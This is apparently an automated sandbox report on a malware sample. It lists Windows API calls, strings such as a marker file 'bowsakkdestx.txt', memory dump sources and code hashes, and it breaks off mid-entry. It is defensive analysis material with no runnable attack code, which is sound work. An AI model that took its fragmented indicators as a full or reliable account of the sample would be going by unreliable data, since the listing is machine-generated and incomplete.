                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUuid$CreateFree
                                                                                                  • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                  • API String ID: 3044360575-2335240114
                                                                                                  • Opcode ID: af89ab2054d7e741c135ea52dcbbdc61f89449366033c8d06dcd08358711a88c
                                                                                                  • Instruction ID: f4e5c2a40aee3d92799e37f9565094377afd15baf5805e77ed1dd5c755e20e8f
                                                                                                  • Opcode Fuzzy Hash: af89ab2054d7e741c135ea52dcbbdc61f89449366033c8d06dcd08358711a88c
                                                                                                  • Instruction Fuzzy Hash: 7A21DA71104301ABD710DF24D84479BBBE8AB81758F008E6FF48993251D7799548C796
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047C48B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047C4A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: 90bb673d11b9bcc11eca01541edc07159e237314db34d68d3e9fe08669211440
                                                                                                  • Instruction ID: 9a7c3e67f8ba65160695a491d69174d84095aaa12ade839ffe9e21d7ad901bd0
                                                                                                  • Opcode Fuzzy Hash: 90bb673d11b9bcc11eca01541edc07159e237314db34d68d3e9fe08669211440
                                                                                                  • Instruction Fuzzy Hash: D801FE72A8022833DD306965AC47FEB7B6CDB62721F0000ABFE08D7141D5E5594557D1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0048BA4A
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0048BA73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                  • String ID: 0$>W
                                                                                                  • API String ID: 1693014935-1072398759
                                                                                                  • Opcode ID: fb3d8665c90491ccd5e8439963c5620ff237f6760c3f0823fb1c41dacad51761
                                                                                                  • Instruction ID: 2af1901d3b9441401c5af66eef2a49e61f2a633f24bafb2eab91702749df8f17
                                                                                                  • Opcode Fuzzy Hash: fb3d8665c90491ccd5e8439963c5620ff237f6760c3f0823fb1c41dacad51761
                                                                                                  • Instruction Fuzzy Hash: ACF0AFB0C042189BEB00DF90D95979EBFB8BB08308F108149D8147A380D7BA1608CFD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047C438
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047C44E
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0047C45B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendDeleteFileFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 610490371-2616962270
                                                                                                  • Opcode ID: 310aafc71d5f832b581b6ab51b8336eee5427c191869fb69b9efc6320f91fe10
                                                                                                  • Instruction ID: e8a30104569926e889f8620b8395ee6346830ee98cf1a5e72dfe0c3b426caf4d
                                                                                                  • Opcode Fuzzy Hash: 310aafc71d5f832b581b6ab51b8336eee5427c191869fb69b9efc6320f91fe10
                                                                                                  • Instruction Fuzzy Hash: C2E08675A4031C67EB20ABA0DC8AFD57B7CEB14B01F004092BB48F21C0D6B0A5889B51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2X
                                                                                                  • API String ID: 2102423945-594558197
                                                                                                  • Opcode ID: 07eee251a7d842568bee3f168efc3c1b41b8f8816eab388d2c5059023626a7c0
                                                                                                  • Instruction ID: d2d9019a35bc8217825cfdd918ec7ae3a457105aff6b738427e2ac1e4c4b4900
                                                                                                  • Opcode Fuzzy Hash: 07eee251a7d842568bee3f168efc3c1b41b8f8816eab388d2c5059023626a7c0
                                                                                                  • Instruction Fuzzy Hash: 95F0323828874065FB10A7A4BC0BB193E81A334F08F00105EE9093A2E2D3ED224CB3DE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 004BF251
                                                                                                    • Part of subcall function 004A0CFC: std::exception::_Copy_str.LIBCMT ref: 004A0D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF266
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,?,<yW,?,?,?,?,?,00493B9C,?,0057793C,?,00000001), ref: 004A0F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                  • String ID: TeT$TeT
                                                                                                  • API String ID: 757275642-4013248818
                                                                                                  • Opcode ID: bb6ee87198655504ac067595ec98679b09eec024fcb9420698d37ee136b4f620
                                                                                                  • Instruction ID: 36ea401ecdc0d3c200e2d13bdfe37b135e4ba8821c5770de424990d43b878183
                                                                                                  • Opcode Fuzzy Hash: bb6ee87198655504ac067595ec98679b09eec024fcb9420698d37ee136b4f620
                                                                                                  • Instruction Fuzzy Hash: D6D01774C0020CBBCB00EFA5C489CCEBBB8AA01308B408466AD1497241EA74A3098B85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove_strtok
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446180046-0
                                                                                                  • Opcode ID: 0b807efe8bc2fdbc412e981912ac1b4ae68523ab9014e10e36fa41f2683569eb
                                                                                                  • Instruction ID: 73e6f30f393b25d082cba8826a1a803dbf2ca321ccecda5f747cd4333bfd4040
                                                                                                  • Opcode Fuzzy Hash: 0b807efe8bc2fdbc412e981912ac1b4ae68523ab9014e10e36fa41f2683569eb
                                                                                                  • Instruction Fuzzy Hash: 0481AE70900206EFDF24DF59C9807DABBF1FF18304F108A6EE40957241D3BAAA54CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  • Opcode ID: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                  • Instruction ID: 356070d523c0dafb5a5b6451408df627323b2fc91907964de3aa0fd12f6868bc
                                                                                                  • Opcode Fuzzy Hash: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                  • Instruction Fuzzy Hash: D751B530A00705BBCF249FA98A4156F7FB1AF01324F24877FE825963D0D7B89D518B49
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004AC6AD
                                                                                                  • __isleadbyte_l.LIBCMT ref: 004AC6DB
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004AC709
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004AC73F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: 5c7913ea9a251d0fec83050cf6c40b231afa80567882234efb8c47fabdcef5ee
                                                                                                  • Instruction ID: 338e9074cba2ef5583e2d4b2a31fbcb0daa0ebdf7d5d7a7985445b866cbc4b79
                                                                                                  • Opcode Fuzzy Hash: 5c7913ea9a251d0fec83050cf6c40b231afa80567882234efb8c47fabdcef5ee
                                                                                                  • Instruction Fuzzy Hash: 1731D034600246EFDB61CF35CC84BAB7BA9FF52310F15842AE4248B2A0E734E851DB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0047F125
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0047F198
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0047F1A1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0047F1A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1421093161-0
                                                                                                  • Opcode ID: cb848cbaac2c762b3c2b07c1573db5367e07149e6855d91ec0ec6cec467eb5eb
                                                                                                  • Instruction ID: 6cecf51b5f8855f5275a5b5c582745f491cc1acd8ebc1bdfc23f64073eeb1cc2
                                                                                                  • Opcode Fuzzy Hash: cb848cbaac2c762b3c2b07c1573db5367e07149e6855d91ec0ec6cec467eb5eb
                                                                                                  • Instruction Fuzzy Hash: DB31F536900104EBDB14AF68CC4ABEF7B78EB05704F508129F91567281D7796A49CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 005370AB
                                                                                                    • Part of subcall function 005377A0: ___BuildCatchObjectHelper.LIBCMT ref: 005377D2
                                                                                                    • Part of subcall function 005377A0: ___AdjustPointer.LIBCMT ref: 005377E9
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 005370C2
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 005370D4
                                                                                                  • CallCatchBlock.LIBCMT ref: 005370F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: e2bceb813598ceba53c64755c7909ceeea72714113ea74c012f197180a6af263
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: C501C27280050ABBCF22AF55CC09EDA7FAAFF88754F158414F91866121D372E961EBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00495007: __getptd_noexit.LIBCMT ref: 00495008
                                                                                                    • Part of subcall function 00495007: __amsg_exit.LIBCMT ref: 00495015
                                                                                                  • __calloc_crt.LIBCMT ref: 00495A01
                                                                                                    • Part of subcall function 00498C96: __calloc_impl.LIBCMT ref: 00498CA5
                                                                                                  • __lock.LIBCMT ref: 00495A37
                                                                                                  • ___addlocaleref.LIBCMT ref: 00495A43
                                                                                                  • __lock.LIBCMT ref: 00495A57
                                                                                                    • Part of subcall function 00495208: __getptd_noexit.LIBCMT ref: 00495208
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                  • String ID:
                                                                                                  • API String ID: 2580527540-0
                                                                                                  • Opcode ID: 5744320e3ed066ec3cff804ad3edf68046debe42d08fa6a03ea76328c44d992b
                                                                                                  • Instruction ID: c94b5610cf7c4debba226718279a0155267f7464b4ddc34256f79d16fea00ff1
                                                                                                  • Opcode Fuzzy Hash: 5744320e3ed066ec3cff804ad3edf68046debe42d08fa6a03ea76328c44d992b
                                                                                                  • Instruction Fuzzy Hash: E1016D71541700ABEF21BFBA9442B097FA0AF81728F20426FF4559B282CE7849418B6D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: 5bb6fd1531ae7dfc2234044eaeff691329d91f886883fc21e4b48ff161d2dc28
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: 0601437240014EBFCF125E85CC518EF3F62BB2D355F548856FE1954131D23AC9B2AB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32 ref: 004827B9
                                                                                                  • _malloc.LIBCMT ref: 004827C3
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(00890000,00000000,00000001,?,?,?,?,00493B69,?), ref: 00490CA5
                                                                                                  • _memset.LIBCMT ref: 004827CE
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004827E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2824100046-0
                                                                                                  • Opcode ID: ae84931f1e6fe3f7e982704557e287260e2a886c7e81f774cb372a5afffa9ae9
                                                                                                  • Instruction ID: 7593c8fcba5e168c5e9a269b398c28f62cadc1dd8100b60787104950c7b88ef6
